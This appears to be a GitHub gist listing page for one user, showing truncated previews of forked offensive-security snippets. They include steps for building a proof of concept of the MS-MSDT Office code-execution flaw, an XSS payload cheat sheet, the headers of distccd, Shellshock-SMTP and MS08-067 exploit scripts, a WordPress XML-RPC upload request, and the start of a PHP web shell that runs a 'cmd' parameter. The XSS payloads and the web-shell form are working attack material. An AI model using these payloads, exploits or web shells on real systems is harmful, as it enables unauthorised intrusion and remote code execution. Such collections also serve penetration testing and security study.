Juan Pablo Perata cxzero

using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Diagnostics;
public class FileWatcher
{
static FileSystemWatcher watcher;
static Process p;
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Net.Sockets;
namespace tcp_client_file_write
{
internal class Program
{
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme, "ms-msdt:", that invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page, if you want an HTML wrapper to present the file, can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID from the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
cxzero / ms08-067-fixed.py
Last active April 9, 2021 04:40 — forked from thel3l/ms08-067-fixed.py
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified version of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct